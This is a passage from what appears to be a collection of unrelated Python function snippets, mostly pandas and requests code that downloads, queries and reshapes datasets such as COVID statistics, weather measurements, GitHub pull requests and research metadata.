\"Open\") | (df.STATUS == \"Open - Dup\")]\n\tdf = df[[\"LATITUDE\", \"LONGITUDE\"]]\n\tdf = df.dropna(axis =0, subset=[\"LATITUDE\", \"LONGITUDE\"])\n\treturn df", "def _build_single_study_info(study, info, study_proc, proc_samples):\n PI = StudyPerson(info['principal_investigator_id'])\n status = study.status\n if info['publication_doi'] is not None:\n pmids = get_pubmed_ids_from_dois(info['publication_doi']).values()\n info['pmid'] = \", \".join([pubmed_linkifier([p]) for p in pmids])\n info['publication_doi'] = \", \".join([doi_linkifier([p])\n for p in info['publication_doi']])\n\n else:\n info['publication_doi'] = \"\"\n info['pmid'] = \"\"\n if info[\"number_samples_collected\"] is None:\n info[\"number_samples_collected\"] = 0\n info[\"shared\"] = _get_shared_links_for_study(study)\n # raw data is any artifact that is not Demultiplexed or BIOM\n\n info[\"num_raw_data\"] = len([a for a in study.artifacts()\n if a.artifact_type not in ['Demultiplexed',\n 'BIOM']])\n info[\"status\"] = status\n info[\"study_id\"] = study.id\n info[\"pi\"] = study_person_linkifier((PI.email, PI.name))\n del info[\"principal_investigator_id\"]\n del info[\"email\"]\n # Build the proc data info list for the child row in datatable\n info[\"proc_data_info\"] = []\n for data_type, proc_datas in viewitems(study_proc[study.id]):\n info[\"proc_data_info\"].extend([\n _build_single_proc_data_info(pd_id, data_type, proc_samples[pd_id])\n for pd_id in proc_datas])\n return info", "def example_data():\n return {\n # \"$schema\": \"\",\n \"id\": \"12345-abcde\",\n \"metadata\": {\n \"title\": \"My record\",\n \"date\": \"2020-09-20\",\n },\n \"pids\": {\n \"oaiid\": {\"value\": \"\", \"provider\": \"local\"},\n },\n }", "def get_data_dict(self):\n\n print('---------repo creation date------------------')\n print('start date', self.start_date)\n 
print('---------------------------------------------')\n print('------Commits----------')\n print(self.commits)\n print('--------------------------------------------')\n\n df = pd.DataFrame.from_records(self.commits) # pylint: disable=invalid-name\n df.date = pd.to_datetime(df.date, utc=True, unit='s')\n df.set_index('date', inplace=True)\n df.index = df.index.floor('D')\n\n date_range = pd.date_range(start=self.start_date, end=self.end_date, freq=self.date_unit)\n date_range = date_range.floor('D')\n\n grouped = df.groupby('author')\n new_df = pd.DataFrame(index=date_range)\n for name, group in grouped:\n new_df[name] = group.groupby('date').size()\n new_df.fillna(0, inplace=True)\n\n return {\n 'x': new_df.index.strftime('%Y-%m-%d').tolist(),\n 'y': new_df.columns.tolist(),\n 'z': new_df.T.values.astype('int32').tolist()\n }", "def make_df_from_json(json_files, out_file):\n table = [[\"name\", \n \"cik\", \n \"city\",\n \"state\",\n \"street1\",\n \"street2\",\n \"zip_code\",\n \"year_of_incorp\", \n \"min_inv\", \n \"tot_off\", \n \"tot_sold\", \n \"tot_rem\", \n \"ind_group_type\", \n \"has_non_accred\", \n \"num_non_accred\", \n \"tot_num_inv\"\n ]] \n\n for json_dict in json_files:\n\n with open(json_dict, \"rb\") as f:\n data = json.load(f)\n print(json_dict)\n\n for i, key in enumerate(data):\n # if i % 1000 == 0:\n # print(i)\n entry = data[key] \n if entry == {}:\n #print(\"missing entry {0}\".format(i))\n continue\n row = []\n\n primary_issuer = entry[\"Primary Issuer\"]\n cik = primary_issuer[\"cik\"]\n name = primary_issuer[\"entity_name\"]\n phone = primary_issuer[\"phone\"]\n year_of_incorp = primary_issuer[\"year_of_incorp\"]\n address = primary_issuer[\"address\"]\n city = address[\"city\"]\n state = address[\"state\"]\n street1 = address[\"street1\"]\n street2 = address[\"street2\"]\n zip_code = address[\"zip_code\"]\n\n secondary_issuers = entry[\"Secondary Issuers\"]\n related_people = entry[\"Related People\"]\n \n offering_data = entry[\"Offering Data\"]\n min_inv = offering_data[\"min_investment_accepted\"]\n tot_off = offering_data[\"total_offering_amount\"]\n tot_sold = offering_data[\"total_amount_sold\"]\n tot_rem = offering_data[\"total_remaining\"]\n ind_group_type = offering_data[\"ind_group_type\"]\n has_non_accred = offering_data[\"has_non_accred\"]\n num_non_accred = offering_data[\"num_non_accred\"]\n tot_num_inv = offering_data[\"tot_num_inv\"] \n\n row = [name, \n cik, \n city,\n state,\n street1,\n street2,\n zip_code,\n year_of_incorp,\n min_inv,\n tot_off,\n tot_sold,\n tot_rem,\n ind_group_type,\n has_non_accred,\n num_non_accred,\n tot_num_inv\n ]\n\n table.append(row)\n\n df = pd.DataFrame(table)\n df.to_csv(out_file)\n\n return 0", "def search_andsetvalues(promise, constituency, party, df: pd.DataFrame, i, df_scraped) -> pd.DataFrame:\n candidates = df_scraped.loc[(df_scraped['constituency'] == constituency) & (df_scraped['party'] == party)] #& \n\n for j, row in candidates.iterrows():\n if compare_promises(row[\"election_promise_1\"][\"fi\"], row[\"election_promise_1\"][\"se\"], \n row[\"election_promise_1\"][\"en\"], promise):\n df.at[i,'name'] = row[\"first_name\"] + \" \" + row[\"last_name\"]\n df.at[i, 'number'] = str(row[\"election_number\"]) \n df.at[i,'image'] = \"https://ehdokaskone.yle.webscale.fi/\" + row['image']\n return df", "def download(self, verbose):\n # Download datasets\n if verbose:\n print(\"Retrieving datasets from Our World In Data https://github.com/owid/covid-19-data/\")\n # Vaccinations\n v_rec_cols = [\n \"date\", 
\"location\", \"iso_code\", \"total_vaccinations\", \"people_vaccinated\", \"people_fully_vaccinated\"]\n v_rec_df = pd.read_csv(self.URL_V_REC, usecols=v_rec_cols)\n v_loc_df = pd.read_csv(self.URL_V_LOC, usecols=[\"location\", \"vaccines\"])\n v_df = v_rec_df.merge(v_loc_df, how=\"left\", on=\"location\")\n # Tests\n pcr_rec_cols = [\"ISO code\", \"Date\", \"Daily change in cumulative total\", \"Cumulative total\"]\n pcr_df = pd.read_csv(self.URL_P_REC, usecols=pcr_rec_cols)\n pcr_df = pcr_df.rename(columns={\"ISO code\": \"iso_code\", \"Date\": \"date\"})\n pcr_df[\"cumsum\"] = pcr_df.groupby(\"iso_code\")[\"Daily change in cumulative total\"].cumsum()\n pcr_df = pcr_df.assign(tests=lambda x: x[\"Cumulative total\"].fillna(x[\"cumsum\"]))\n # Combine data (vaccinations/tests)\n df = v_df.set_index([\"iso_code\", \"date\"])\n df = df.combine_first(pcr_df.set_index([\"iso_code\", \"date\"]).loc[:, [\"tests\"]])\n df = df.reset_index()\n # Location (country/province)\n df[\"location\"] = df[\"location\"].replace(\n {\n # COG\n \"Congo\": \"Republic of the Congo\",\n }\n )\n df = df.loc[~df[\"iso_code\"].str.contains(\"OWID_\")]\n df[\"location\"] = df.groupby(\"iso_code\")[\"location\"].bfill()\n df.loc[df[\"location\"] == df[\"iso_code\"], \"location\"] = None\n df.loc[df[\"location\"].isna(), \"location\"] = df.loc[df[\"location\"].isna(), \"iso_code\"].apply(\n lambda x: coco.convert(x, to=\"name_short\", not_found=None))\n df[self.PROVINCE] = self.UNKNOWN\n return df", "def _request_info(self):\n \n current_date = str(datetime.datetime.now(pytz.timezone('US/Mountain')))\n json_dct = {'search_title': self.job_title, \\\n 'search_location': self.job_location, \\\n 'search_date': current_date, 'job_site': 'indeed'}\n # Holds the actual CSS selector as the key and the label I want to store\n # the info. as as the key. \n possible_attributes = {'.jobtitle': \"job_title\", '.company': \"company\", \\\n '.location': \"location\", '.date': \"date\", \\\n '.iaLabel': \"easy_apply\"}\n for k, v in possible_attributes.iteritems(): \n res = self.row.select(k)\n if res: \n json_dct[v] = res[0].text\n # Now let's grab the href and pass that on to another function to \n # get that info. \n href = self.row.find('a').get('href')\n json_dct['href'] = href\n json_dct['posting_txt'] = self._query_href(href)\n\n return json_dct", "def viewdata(data):\n\n print('_' * 50)\n print('Number of Results: ' + str(data[0]['numResults']))\n print('\\nSearchURL: ' + data[0]['searchURL'])\n print('_' * 50)\n\n i = 1\n for m in data[1]:\n print(str(i) + '. 
')\n for n in m:\n print(str(n) + ': ' + str(m[n]))\n i += 1\n print('\\n')", "def data_dict0():\n\n # 0- Sample from detectron2 -> 5 different sections.\n info_val0 = [{\"date_created\": \"2020-03-15 04:59:45.442988\",\n \"description\": \"Automatically generated COCO json file for Detectron2.\"}]\n images0 = [{\"id\": \"image\", \"width\": 100,\n \"height\": 100, \"file_name\": \"image.png\"}]\n annotations0 = [{\"id\": 1, \"image_id\": \"image\", \"bbox\": [70.0, 30.0, 30.0, 40.0],\n \"area\": 1200.0, \"iscrowd\": 0, \"category_id\": 0}]\n categories0 = [{\"id\": 0, \"name\": \"first\"}]\n licence0 = 'null'\n\n return [{\"info\": info_val0,\n \"images\": images0,\n \"annotations\": annotations0,\n \"categories\": categories0,\n \"licenses\": licence0}]", "def _info(self) -> tfds.core.DatasetInfo:\n return tfds.core.DatasetInfo(\n builder=self,\n description=_DESCRIPTION,\n features=tfds.features.FeaturesDict({\n 'id': tfds.features.Text(),\n 'program': tfds.features.Text(),\n 'date': tfds.features.Text(),\n 'url': tfds.features.Text(),\n 'summary': tfds.features.Text(),\n 'utt': tfds.features.Sequence(tfds.features.Text()),\n 'speaker': tfds.features.Sequence(tfds.features.Text()),\n }),\n supervised_keys=('utt', 'summary'),\n homepage='https://github.com/zcgzcgzcg1/MediaSum',\n citation=_CITATION,\n )", "def precip():\n date_prcp=session.query(measurements.date,measurements.prcp).all()\n date_prcp_df=pd.DataFrame(date_prcp).set_index('date')\n date_prcp_dict=date_prcp_df.to_dict()\n return jsonify(date_prcp_dict)", "def precipitation():\r\n # Query all measurements\r\n results = session.query(Measurement).all()\r\n\r\n # Create a dictionary from the row data and append to a list of all_precipitation\r\n all_precipitation = []\r\n\r\n for row in results:\r\n precipitation_dict = { row.date : row.prcp}\r\n all_precipitation.append(precipitation_dict)\r\n # print(all_precipitation)\r\n return jsonify(all_precipitation)", "def dataset_grabber(sess, link):\n json_dict = sess.get(link).json()\n if '.geojson' in link:\n dataset = gpd.GeoDataFrame.from_features(json_dict['features'])\n else:\n dataset = pd.DataFrame(json_dict)\n return dataset", "def get_pr_info(num):\r\n url = \"https://api.github.com/repos/edx/edx-platform/pulls/{num}\".format(num=num)\r\n username, token = get_github_creds()\r\n headers = {\r\n \"Authorization\": \"token {}\".format(token),\r\n \"User-Agent\": \"edx-release\",\r\n }\r\n response = requests.get(url, headers=headers)\r\n result = response.json()\r\n if not response.ok:\r\n raise requests.exceptions.RequestException(result[\"message\"])\r\n return result", "def fetch(url, header_path, id, ip, dbase, targets_table):\n # url = 'http://esimbad/testGSAV7/reslabo?FENID=resLaboPatDitep&NIP={}' \\\n # '&STARTDATE={}&ENDDATE={}'\n\n # header_path = '~/workspace/data/biology/header.csv'\n # constant names specific to our database\n KEY1 = 'id'\n KEY2 = 'NIP'\n C1J1 = 'C1J1'\n\n header = pd.read_csv(header_path, sep=';', encoding='latin1').columns\n\n\n engine = get_engine(id, ip, dbase)\n\n df_ids = sql2df(engine, targets_table)[[KEY1, 'nip', C1J1]]\n df_ids.rename({'nip': KEY2}, inplace=True, axis=1)\n df_ids['patient_id'] = df_ids[KEY1]\n\n cols = [KEY2, 'Analyse', 'Resultat', 'Date prelvt']\n df_res = pd.DataFrame(data=None, columns=cols)\n\n for index, row in df_ids.iterrows():\n nip = row[KEY2].replace(' ', '')\n patient_id = row['patient_id']\n c1j1_date = row[C1J1].date()\n start_date = c1j1_date - timedelta(weeks=8)\n\n c1j1 = str(c1j1_date).replace('-', '')\n 
start = str(start_date).replace('-', '')\n\n req = requests.get(url.format(nip, start, c1j1))\n values = BeautifulSoup(req.content, 'html.parser').body.text\n\n new_df = pd.read_csv(StringIO(values), sep=';', header=None,\n index_col=False, names=header)\n new_df = new_df.loc[:, cols + ['LC']] # remove LC\n\n # normalize nip\n new_df[KEY2] = row[KEY2]\n # new_df[KEY2] = new_df[KEY2].map(str)\n # new_df[KEY2] = [nip[:4] + '-' + nip[4:] for nip in new_df[KEY2]]\n\n new_df.drop('LC', axis=1, inplace=True)\n\n df_res = pd.concat([df_res, new_df], axis=0,\n sort=False, ignore_index=True)\n\n return df_res", "def extract_all_lazy():\n\n\t#Construct filepaths: Data COMP_INFO_1\n\tdata_ci1_name = \"DATA_2016_COMP_INFO_1.csv\"\n\tdata_ci1_fullname = os.path.join(files_location, data_ci1_name)\n\t#Data COMP_INFO_2\n\tdata_ci2_name = \"DATA_2016_COMP_INFO_2.csv\"\n\tdata_ci2_fullname = os.path.join(files_location, data_ci2_name)\n\t#Data PROPERTY INFO\n\tdata_pi_name = \"DATA_2016_PROPERTY_INFO_ST.csv\"\n\tdata_pi_fullname = os.path.join(files_location, data_pi_name)\n\t#Data General Info\n\tdata_gi_name = \"DATA_2016_GENERAL_INFO.csv\"\n\tdata_gi_fullname = os.path.join(files_location, data_gi_name)\n\n\t#Read & Process COMP_INFO\n\tdata_ci1 = pd.read_csv(data_ci1_fullname, skiprows=2, usecols = constants.keep_columns_CI, encoding='ISO-8859-1')\n\tdata_ci2 = pd.read_csv(data_ci2_fullname, skiprows=2, usecols = constants.keep_columns_CI, encoding='ISO-8859-1')\n\n\tdata_ci = data_ci1.append(data_ci2)\n\tdata_ci['QUESTION'] = data_ci['QUESTION'].replace(constants.ci_mapping)\n\t# Take only the survey questions mapped\n\tdata_ci = data_ci[data_ci['QUESTION'].isin(constants.ci_mapping.values())]\n\tdata_ci = data_ci.set_index(['PROPERTY_CODE','PROPERTY_NAME','JOB_CODE','POSITION'])\n\tdata_ci = data_ci.pivot(columns=\"QUESTION\")\n\tdata_ci.columns = [\"_\".join(pair) for pair in data_ci.columns]\n\tdata_ci = data_ci.reset_index()\n\n\t#Read & Process Property Info data\n\tdata_pi = pd.read_csv(data_pi_fullname, usecols = constants.keep_columns_PI, encoding='ISO-8859-1')\n\t#survey_type_transformed = transform.surveytype_categorical(data_pi)\n\t#data_pi = pd.merge(data_pi, survey_type_transformed, on=['PROPERTY_CODE'])\n\n\t#Read & Process General Info\n\tdata_gi = pd.read_csv(data_gi_fullname, skiprows = 2, usecols = constants.keep_columns_GI, encoding='ISO-8859-1')\n\tdata_gi['QUESTION'] = data_gi['QUESTION'].replace(constants.gi_mapping)\n\t# Take onl the survey questions mapped\n\tdata_gi = data_gi[data_gi['QUESTION'].isin(constants.gi_mapping.values())]\n\tdata_gi = data_gi.set_index(['PROPERTY_CODE','PROPERTY_NAME'])\n\tdata_gi = data_gi.pivot(columns=\"QUESTION\")\n\tdata_gi.columns = [\"_\".join(pair) for pair in data_gi.columns]\n\tdata_gi = data_gi.reset_index()\n\n\t#This frame needs to be reworked\n\td_ci = pd.merge(data_gi, data_pi, on = ['PROPERTY_CODE','PROPERTY_NAME'])\n\td_ci = pd.merge(d_ci, data_ci, on = ['PROPERTY_CODE','PROPERTY_NAME'],suffixes= ['_ci','_gi'])\n\n\t#Observations by Dimensions to determine top X markets\n\t#Can this be in a better position?\n\td_ci = d_ci[~(d_ci['PROPERTY_NAME'].isin(constants.del_rows_property_name))]\n\td_ci['POSITION'] = d_ci['POSITION'].astype(str)\n\n\tpayload = {}\n\tpayload['gi'] = data_gi\n\tpayload['pi'] = data_pi\n\tpayload['ci'] = data_ci\n\tpayload['d_ci'] = d_ci\n\n\treturn payload", "def _fetch_idjj_data(year=None):\n try:\n if year is None:\n year = _get_max_year([11, 12, 34, 35]) + 1\n\n database = 'PrisonMain'\n tbl_admit = 
'IDJJ_Admissions'\n tbl_exit = 'IDJJ_exits'\n cols = 'Age, SFY, County, sex, race, admtypo, OFFTYPE9, hclass'\n condition = f'SFY = {year}'\n\n df_a = _fetch_from_ms_sql_server(database, tbl_admit, cols, condition)\n df_e = _fetch_from_ms_sql_server(database, tbl_exit, 'Exit'+cols, condition)\n\n return (\n pd.DataFrame()\n .append(_tranform_idjj(df_a))\n .append(_tranform_idjj(df_a, age1720=True))\n .append(_tranform_idjj(df_e, exit=True))\n .append(_tranform_idjj(df_e, age1720=True, exit=True))\n )\n except:\n raise", "def fetch_tikhonov_data(dpath='/tmp/glm-tools'):\n if os.path.exists(dpath):\n shutil.rmtree(dpath)\n os.mkdir(dpath)\n\n base_url = \"https://raw.githubusercontent.com/glm-tools/datasets/master\"\n url = os.path.join(base_url, \"tikhonov/fixations.csv\")\n fname = os.path.join(dpath, 'fixations.csv')\n urllib.urlretrieve(url, fname)\n fixations_df = pd.read_csv(fname)\n\n url = os.path.join(base_url, \"tikhonov/probes.csv\")\n fname = os.path.join(dpath, 'probes.csv')\n urllib.urlretrieve(url, fname)\n probes_df = pd.read_csv(fname)\n\n url = os.path.join(base_url, \"tikhonov/spiketimes.csv\")\n fname = os.path.join(dpath, 'spiketimes.csv')\n urllib.urlretrieve(url, fname)\n spikes_df = pd.read_csv(fname, header=None)\n\n return fixations_df, probes_df, spikes_df", "def get_metadata_list(path, file, task_description, dataset_description):\n df = pd.read_csv(os.path.join(path, file), sep='\\t')\n\n for column in COMMON_FIELDS:\n if column not in df.columns:\n logging.getLogger('zenodo_upload').critical('File {} is missing column {}'.format(os.path.join(path, file), column))\n exit(1)\n\n df = df[(df['DOI'].str.lower() == 'new') | (df['DOI'].isna())]\n if df.empty:\n return None\n\n metadata_list = []\n for index, row in df.iterrows():\n title = ' '.join([row['Software'], row['Version'], task_description, 'of the', dataset_description + ', samples ' + row['SamplesUsed']])\n\n row_copy= row.copy().drop(COMMON_FIELDS).dropna()\n if 'Description' in row_copy.index:\n description = row_copy.pop('Description') + '<br>'\n else:\n description = ''\n description += '<strong>Software: </strong>' + row['Software'] + '<br>'\n description += '<strong>SoftwareVersion: </strong>' + str(row['Version']) + '<br>'\n description += '<strong>DataURL: </strong> https://data.cami-challenge.org/participate'\n for item in row_copy.iteritems():\n if len(description) > 0:\n description = description + '<br>'\n description = description + str('<strong>' + item[0]) + ':</strong> ' + str(item[1])\n\n creators_metadata = get_creators_metadata(row)\n metadata = {\n 'metadata': {\n 'title': title,\n 'upload_type': 'dataset',\n 'communities': [{'identifier': 'cami'}],\n 'description': description,\n 'creators': creators_metadata,\n 'access_right': 'open',\n 'license': 'cc-by',\n 'version': row['Version'],\n 'keywords': KEYWORDS + [task_description, dataset_description]\n },\n 'files': row['FileName']\n }\n metadata_list.append(metadata)\n return metadata_list", "def data_frame_info(self):\r\n print(self.dataframe_name)\r\n print(self.data_frame.info())", "def _read_projects_df_from_db(self, include_stats=True):\n\n projects_df = None\n\n # TODO: should cursor be created here or no?\n # https://www.datacamp.com/community/tutorials/tutorial-postgresql-python # noqa\n # shows creation of a cursor even though no methods are called on it\n with self._transaction.dict_cursor():\n # TODO: is there a better way to access this?\n conn = self._transaction._conn\n\n queries = _PROJECT_SQLS if include_stats else 
[_PROJECT_SQLS[0]]\n for stats_keys, sql_source in queries:\n if callable(sql_source):\n curr_sql = sql_source(*stats_keys)\n else:\n curr_sql = sql_source.format(*stats_keys)\n\n curr_df = pd.read_sql(curr_sql, conn)\n\n if projects_df is None:\n projects_df = curr_df\n else:\n # left join here: the first query produces a df with a\n # COMPLETE list of all projects, whereas subsequent\n # queries only return info on projects relevant to their\n # computed statistic.\n projects_df = pd.merge(projects_df, curr_df,\n how=\"left\", on=[\"project_id\"])\n\n # make the project_id the index of the final data frame, but\n # do NOT drop the project_id column from the data frame.\n projects_df.set_index('project_id', drop=False, inplace=True)\n return projects_df", "def get_info(now):\n url = 'https://api.stackexchange.com/2.2/info'\n payload = {\n 'site': 'stackoverflow'\n }\n result = requests.get(url, params=payload)\n # print(result.url) # https://api.stackexchange.com/2.2/info?site=stackoverflow\n result = result.json()\n items = result['items'][0]\n items_seq = {k:[v] for k, v in items.items()}\n df = pd.DataFrame(items_seq)\n df['time_requested'] = now\n return df", "def get_organisation_metadata() -> pd.DataFrame:\n return GETTER.organisationmetadata", "def identify_primary_reference_datasets(conn, log):\n\n primary_ref = {}\n\n primary_ref['refimg_id_ip'] = phot_db.find_primary_reference_image_for_field(conn)\n\n query = 'SELECT facility, filter, software FROM reference_images WHERE refimg_id=\"'+str(primary_ref['refimg_id_ip'])+'\"'\n t = phot_db.query_to_astropy_table(conn, query, args=())\n\n primary_ref['facility_id'] = t['facility'][0]\n primary_ref['software_id'] = t['software'][0]\n\n query = 'SELECT filter_id, filter_name FROM filters WHERE filter_name=\"ip\"'\n t = phot_db.query_to_astropy_table(conn, query, args=())\n primary_ref['ip'] = t['filter_id'][0]\n\n for f in ['rp', 'gp']:\n query = 'SELECT filter_id, filter_name FROM filters WHERE filter_name=\"'+f+'\"'\n t = phot_db.query_to_astropy_table(conn, query, args=())\n primary_ref[f] = t['filter_id'][0]\n\n query = 'SELECT refimg_id FROM reference_images WHERE facility=\"'+str(primary_ref['facility_id'])+\\\n '\" AND software=\"'+str(primary_ref['software_id'])+\\\n '\" AND filter=\"'+str(t['filter_id'][0])+'\"'\n qs = phot_db.query_to_astropy_table(conn, query, args=())\n\n if len(qs) > 0:\n primary_ref['refimg_id_'+f] = qs['refimg_id'][0]\n else:\n log.info('WARNING: Database contains no primary reference image data in filter '+f)\n\n log.info('Identified the primary reference datasets for this field as:')\n for key, value in primary_ref.items():\n log.info(str(key)+' = '+str(value))\n\n return primary_ref", "async def get_project_info(project_urls):\n project_info = []\n for url in project_urls:\n soup = await get_page(url)\n about = soup.find_all(\"p\")\n title = soup.find(\"h3\").text\n student = about[0].text.splitlines()[2].strip()\n details = about[1].text\n name = about[0].find(\"a\").text\n project_info.append({'Organization': name, 'title': title,\n 'student': student, 'details': details,\n 'link': url})\n\n return project_info", "def update_datatable(clickData, selected_year, search_ids_keywords, search_keywords, selected_funding):\n\n prof_name = clickData['points'][0]['customdata']\n print(\"selected professor for network graph is \", prof_name)\n\n # TODO: Handle no search_ids or Nonetype search ids DONE\n # print(\" Search IDS ************* 8********** ****** here are this\", search_ids_keywords[0:,0])\n\n 
professor_data = funding_data[(funding_data['Lead Investigator:'] == prof_name)\n & (funding_data.start_year.isin(selected_year))\n # & (funding_data._id.isin(search_ids_keywords[0:,0]))\n & (funding_data['Program Cycle:'].isin(selected_funding))]\n\n if search_keywords and len(search_keywords) > 0:\n search_ids_keywords = json.loads(search_ids_keywords)\n search_ids_keywords = np.array(search_ids_keywords)\n professor_data = professor_data[(professor_data._id.isin(search_ids_keywords[0:, 0]))]\n\n\n # collaborating_personnel_counts = collaborating_personnel.investigator.value_counts()\n professor_data = professor_data[\n [\"Proposal Number:\", \"Proposal Title:\"]]\n\n # [\"Proposal Number:\", \"Submitting Institution Name:\", \"Project Status:\", \"Proposal Title:\"]]\n return professor_data.to_dict(\"rows\")\n # return professor_data", "def info(self):\n for key, value in self.dataset['info'].items():\n print('{}: {}'.format(key, value))", "def extract_depto(succId = 439) :\n deps_api = 'https://www.lacomer.com.mx/lacomer-api/api/v1/public/header/inicio?cambioSucc=false&succFmt=100&succId={}'.format(succId)\n deps_json = json.loads(requests.get(deps_api).text)['departamentos']\n deps_list = list(deps_json.keys())\n deps_df = []\n\n for depto in deps_list :\n \n tmp = pd.DataFrame(deps_json[depto])\n tmp['dept'] = depto\n deps_df.append(tmp)\n \n deps_df = pd.concat(deps_df)\n deps_df['dept'].unique()\n\n sucursales = extract_sucursales()\n deps_df['succId'] = succId\n deps_df['sucursal'] = sucursales.loc[sucursales['id'] == succId,'sucursal'].iloc[0]\n\n return deps_df", "def create_df(link=config.api_link, key=config.api_key, master_file = 'pvd_crime_master.csv'):\n #only want reports we don't already have, so what is the most recent date in the master\n master = pd.read_csv(master_file, nrows=1)\n most_recent = pd.to_datetime(master['reported_date'])[0]\n most_recent_format = most_recent.strftime('%Y-%m-%dT%H:%M:%S.000')\n\n headers = {'Authentication': key} #api_key\n \n query = \"SELECT * WHERE reported_date > '\"+most_recent_format+\"' ORDER BY reported_date LIMIT 13000\"\n\n params = {'$query': query}\n\n response = requests.get(link, headers=headers, params=params) #json data\n response_json = response.json() #json data as list of dictionaries\n \n #create and return pandas DataFrame of json response\n\n return pd.DataFrame(response_json)", "def load_data():\n df = pd.read_csv(\"https://raw.githubusercontent.com/Andrea-Giuliani/Python-Project/master/data/final_dataset.csv\",sep=',') \n return df", "def test_project_detail(self):\n rv = self.app.get(\"/Assignment0\")\n self.assertIn(\"Assignment0\", rv.data)\n self.assertIn(\"2015-02-04 21:57:12.156363\", rv.data)\n self.assertIn(\"221\", rv.data)\n self.assertIn(\"commit assignment0\", rv.data)\n\n self.assertIn(\"Assignment0/Procfile\", rv.data)\n self.assertIn(\"Assignment0/README.md\", rv.data)", "def getDatasetsProjectsFromImages(queryService, imageIds):\n ids = \",\".join([str(i) for i in imageIds])\n \n query_string = \"select i from Image i join fetch i.datasetLinks idl join fetch idl.parent d join fetch d.projectLinks pl join fetch pl.parent where i.id in (%s)\" % ids\n\n images = queryService.findAllByQuery(query_string, None)\n results = {}\n \n for i in images: # order of images not same as imageIds\n pdList = []\n imageId = i.getId().getValue()\n for link in i.iterateDatasetLinks():\n dataset = link.parent\n dName = dataset.getName().getValue()\n if dataset.sizeOfProjectLinks() == 0:\n pdList.append((\"\", dName))\n 
for dpLink in dataset.iterateProjectLinks():\n project = dpLink.parent\n pName = project.getName().getValue()\n pdList.append((pName, dName))\n results[imageId] = pdList\n \n # make sure the map contains all the imageIds\n for iId in imageIds:\n if iId not in results:\n results[iId] = []\n return results", "def load_landkreis_information():\n client = MongoClient(f'mongodb://{os.getenv(\"USR_\")}:{os.getenv(\"PWD_\")}@{os.getenv(\"REMOTE_HOST\")}:{os.getenv(\"REMOTE_PORT\")}/{os.getenv(\"AUTH_DB\")}')\n db = client[os.getenv(\"MAIN_DB\")]\n lk_collection = db[\"lk_overview\"]\n data = pd.DataFrame(list(lk_collection.find()))\n return data", "def get_dataset_details(name, analyst):\n\n template = None\n allowed_sources = user_sources(analyst)\n dataset_object = Dataset.objects(name = name,\n source__name__in=allowed_sources).first()\n if not dataset_object:\n error = (\"Either no data exists for this dataset\"\n \" or you do not have permission to view it.\")\n template = \"error.html\"\n args = {'error': error}\n return template, args\n\n dataset_object.sanitize_sources(username=\"%s\" % analyst,\n sources=allowed_sources)\n\n # remove pending notifications for user\n remove_user_from_notification(\"%s\" % analyst, dataset_object.id, 'Dataset')\n\n # subscription\n subscription = {\n 'type': 'Dataset',\n 'id': dataset_object.id,\n 'subscribed': is_user_subscribed(\"%s\" % analyst,\n 'Dataset',\n dataset_object.id),\n }\n\n #objects\n objects = dataset_object.sort_objects()\n\n #relationships\n relationships = dataset_object.sort_relationships(\"%s\" % analyst, meta=True)\n\n # relationship\n relationship = {\n 'type': 'Datset',\n 'value': dataset_object.id\n }\n\n #comments\n comments = {'comments': dataset_object.get_comments(),\n 'url_key':dataset_object.name}\n\n # favorites\n favorite = is_user_favorite(\"%s\" % analyst, 'Dataset', dataset_object.id)\n\n # services\n service_list = get_supported_services('Dataset')\n\n # analysis results\n service_results = dataset_object.get_analysis_results()\n\n args = {'dataset': dataset_object,\n 'objects': objects,\n 'relationships': relationships,\n 'comments': comments,\n 'favorite': favorite,\n 'relationship': relationship,\n 'subscription': subscription,\n 'name': dataset_object.name,\n 'service_list': service_list,\n 'service_results': service_results}\n\n return template, args", "def build_person_df(person):\n data = {\n \"act\" : [],\n \"modes\": [],\n \"start_time\": [],\n \"end_time\": [],\n \"dur\": [],\n }\n for component in person.plan.day:\n data[\"act\"].append(component.act.lower().title())\n if isinstance(component, activity.Leg):\n data[\"modes\"].append(component.mode.lower().title())\n else:\n data[\"modes\"].append(None)\n data[\"start_time\"].append(component.start_time.hour + component.start_time.minute/60)\n data[\"end_time\"].append(component.end_time.hour + component.end_time.minute/60)\n data[\"dur\"].append(component.duration.total_seconds()/3600)\n df = pd.DataFrame(data)\n df['pid'] = person.pid\n\n return df", "def download(self, verbose):\n\n # Download datasets\n if verbose:\n print(\"Retrieving datasets from COVID-19 Open Data by Google Cloud Platform https://github.com/GoogleCloudPlatform/covid-19-open-data\")\n # Index\n i_cols = [\"location_key\", \"country_name\", \"subregion1_name\", \"subregion2_name\", \"iso_3166_1_alpha_3\"]\n i_df = pd.read_csv(self.URL_I, usecols=i_cols)\n # Mobility\n m_df = pd.read_csv(self.URL_M)\n m_df = (m_df.set_index([\"date\", \"location_key\"]) + 100).reset_index()\n # Combine 
data\n df = m_df.merge(i_df, how=\"left\", on=\"location_key\")\n # Location (country/province)\n df = df.loc[df[\"subregion2_name\"].isna()]\n df[self.PROVINCE] = df[\"subregion1_name\"].fillna(self.UNKNOWN).apply(unidecode)\n df[\"country_name\"] = df[\"country_name\"].replace(\n {\n # CIV\n \"Ivory Coast\": \"Cote d'Ivoire\",\n }\n )\n return df", "def extract_details(df):\n df_RSinfo = df[['pentamer', 'Step details', 'RouteScore details',\n 'Isolated', 'RouteScore', 'log(RouteScore)']]\n\n last3_rxns = ['Buchwald_deprotection', 'Buchwald', 'SNAr']\n for rxn in last3_rxns:\n df_RSinfo[rxn] = [next(step for step in row[-3:] if step['reaction'] == rxn) for row in df['Step details']]\n\n for key in df_RSinfo['RouteScore details'][0].keys():\n df_RSinfo[key] = [row[key] for row in df['RouteScore details']]\n\n return df_RSinfo", "async def get_all_record():\n # X_new = item.to_df()\n # item_str = item.to_string()\n # project_code = int(item_str[item_str.find('=')+1:])\n pg = PostgreSQL()\n return_json = pg.fetch_all_records()\n return return_json", "def _info(self) -> tfds.core.DatasetInfo:\n features = {\n # sequence of [RGB, depth] images\n \"image\": tfds.features.Sequence(\n tfds.features.Image(shape=(600, 800, 3)), length=2,\n ),\n # sequence of image features for [RGB, depth]\n \"images\": tfds.features.Sequence(\n tfds.features.FeaturesDict(\n {\n \"file_name\": tfds.features.Text(),\n \"height\": tf.int64,\n \"width\": tf.int64,\n \"id\": tf.int64,\n },\n ),\n length=2,\n ),\n # both modalities share the same categories\n \"categories\": tfds.features.Sequence(\n tfds.features.FeaturesDict(\n {\n \"id\": tf.int64, # {'pedstrian':1, 'vehicles':2, 'trafficlight':3, 'patch':4}\n \"name\": tfds.features.Text(),\n }\n )\n ),\n # both modalities share the same 